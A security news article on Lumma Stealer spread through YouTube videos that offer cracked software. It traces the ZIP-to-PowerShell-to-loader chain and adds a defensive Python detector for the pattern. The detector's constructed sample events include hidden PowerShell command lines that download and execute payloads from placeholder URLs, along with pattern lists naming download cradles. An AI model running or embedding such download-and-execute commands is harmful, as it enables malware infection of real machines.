Threat actors are deploying YouTube channels as a clandestine conduit for disseminating a variant of Lumma Stealer.
The attackers compromised YouTube accounts and disguised their activity by uploading videos that appear to offer cracked software. The video descriptions carry embedded malicious URLs that entice viewers to download a ZIP file named ‘installer_Full_Version_V.1f2.zip.’
The attackers regularly update the hosted files on file-hosting platforms such as GitHub and MediaFire to stay ahead of detection.
Cybersecurity researchers from Fortinet documented the attack chain. Opening the ZIP file starts a multi-stage infection: an LNK file inside the archive invokes PowerShell to fetch a private .NET loader from a GitHub repository named ‘New,’ owned by an account the researchers identified as John1323456. PowerShell requests the payload from a shortened URL, ‘hxxp://cutt[.]ly/lwD7B7lp,’ which redirects to the actual download location, ‘hxxps://github[.]com/John1323456/New/raw/main/Installer-Install-2023_v0y.6.6[.]exe.’

The .NET loader is obfuscated with SmartAssembly to hinder analysis. It runs its PowerShell stage as a child process configured through .NET process-start properties (RedirectStandardInput, CreateNoWindow and UseShellExecute) so that no console window appears and the script is fed over standard input rather than passed as a command-line argument. For defenders this matters: command-line logging alone will not show the script, whereas PowerShell script block logging (Event ID 4104) still records it.
The PowerShell script extracted by the loader selects a download server based on the current system date, fetches encrypted binary data from it, and then decrypts and decompresses that data into the DLL for the next stage.
The resulting DLL, ‘Agacantwhitey.dll,’ is the core of Lumma Stealer’s attack chain. Before doing anything else it runs anti-VM and anti-debugging checks, inspecting the environment, active window titles, sandbox artefacts, usernames and virtualisation platforms, and proceeds only when it believes it is on a real victim machine.
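The chain above leaves a recognisable trail in process-creation telemetry: Explorer (or later the loader) spawning PowerShell with hidden-window flags, a download cradle, and a URL pointing at a link shortener or a raw-file host such as GitHub. The following is an added example written for this article; it is not code from Fortinet's report or from the malware. It scores Sysmon Event ID 1-style records against those indicators. The field names, the Temp1_ staging-folder convention that Explorer uses when a file is run straight out of a ZIP, and all sample events are assumptions and constructed data, not captured telemetry.

```python
"""Score PowerShell process-creation events for the LNK -> PowerShell -> raw-file
download pattern described in the article. Added example; constructed data only."""
import base64
import re
from dataclasses import dataclass

# Hosts the article names as delivery infrastructure; extend for your environment.
SHORTENER_HOSTS = {"cutt.ly"}
RAW_FILE_HOSTS = {"github.com", "raw.githubusercontent.com", "mediafire.com", "www.mediafire.com"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(?:/\S*)?", re.I)
CRADLE_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile"
    r"|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
STEALTH_FLAG_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-noni(?:nteractive)?\b", re.I)
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# Assumption: Explorer stages a file run directly from a ZIP under %TEMP%\Temp1_<archive>.zip\
ZIP_STAGING_RE = re.compile(r"\\Temp\\Temp1_[^\\]+\.zip(?:\\|$)", re.I)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\(?:Downloads|AppData\\Local\\Temp)\\", re.I)


@dataclass
class ProcessEvent:
    """Subset of Sysmon Event ID 1 fields (names assumed for this example)."""
    image: str
    command_line: str
    parent_image: str
    current_directory: str = ""


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if absent."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def find_reasons(ev: ProcessEvent) -> list[str]:
    """List every indicator the event matches; an empty list means nothing fired."""
    reasons: list[str] = []
    if not re.search(r"\\(?:powershell|pwsh)\.exe$", ev.image, re.I):
        return reasons
    decoded = decode_encoded_command(ev.command_line)
    text = ev.command_line + "\n" + decoded  # scan the decoded script too
    if decoded:
        reasons.append("encoded command line")
    if CRADLE_RE.search(text):
        reasons.append("download cradle")
    for host in URL_RE.findall(text):
        h = host.lower()
        if h in SHORTENER_HOSTS:
            reasons.append(f"link shortener {h}")
        elif h in RAW_FILE_HOSTS:
            reasons.append(f"raw file host {h}")
    if STEALTH_FLAG_RE.search(ev.command_line):
        reasons.append("hidden-window or non-interactive flags")
    if re.search(r"\\explorer\.exe$", ev.parent_image, re.I):
        reasons.append("spawned by Explorer (how a double-clicked LNK launches its target)")
    elif USER_WRITABLE_RE.search(ev.parent_image):
        reasons.append("parent binary in a user-writable directory")
    if ZIP_STAGING_RE.search(ev.current_directory):
        reasons.append("running from Explorer's ZIP staging folder")
    return reasons


def is_suspicious(ev: ProcessEvent, min_reasons: int = 3) -> bool:
    """Alert when several independent indicators coincide, to keep admin noise down."""
    return len(find_reasons(ev)) >= min_reasons


# Constructed sample events (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LNK_STAGE = ProcessEvent(  # stage 1: the LNK inside the ZIP runs PowerShell
    image=PS,
    command_line=r'powershell.exe -w hidden -nop -c "iwr http://cutt.ly/EXAMPLE -OutFile $env:TEMP\stage.exe; Start-Process $env:TEMP\stage.exe"',
    parent_image=r"C:\Windows\explorer.exe",
    current_directory=r"C:\Users\alice\AppData\Local\Temp\Temp1_installer_Full_Version_V.1f2.zip",
)
STAGE2_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://github.com/example-user/New/raw/main/stage2.ps1')"
LOADER_STAGE = ProcessEvent(  # stage 2: the dropped loader runs an encoded script
    image=PS,
    command_line="powershell.exe -nop -w hidden -enc " + base64.b64encode(STAGE2_SCRIPT.encode("utf-16le")).decode(),
    parent_image=r"C:\Users\alice\AppData\Local\Temp\Installer.exe",
    current_directory=r"C:\Users\alice\AppData\Local\Temp",
)
ADMIN_SHELL = ProcessEvent(  # benign: an administrator at a console
    image=PS,
    command_line='powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    parent_image=r"C:\Windows\System32\cmd.exe",
    current_directory=r"C:\Users\bob",
)

if __name__ == "__main__":
    for name, ev in [("LNK_STAGE", LNK_STAGE), ("LOADER_STAGE", LOADER_STAGE), ("ADMIN_SHELL", ADMIN_SHELL)]:
        print(name, is_suspicious(ev), find_reasons(ev))
```

The threshold of three coinciding indicators is a tuning choice: a lone `-NoProfile` from an administrator scores one and stays quiet, while both malicious stages score four or more. Feed the decoded `-EncodedCommand` text through the same checks, as done here, or the second stage would only be caught by its parent path.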

Lumma Stealer, written in C and sold on underground forums, exfiltrates sensitive information from the victim’s system, including browser data, cryptocurrency wallets and browser extensions. It communicates with a command-and-control server, and this variant now uses HTTPS for data exfiltration, which makes the traffic harder to separate from ordinary web browsing.
Threat actors have used various delivery methods to distribute Lumma Stealer. In October, we reported that hackers were using Discord’s Content Delivery Network to disseminate Lumma Stealer.
Researchers caution users not to click on random links and not to download files, cracked software in particular, from untrusted sources.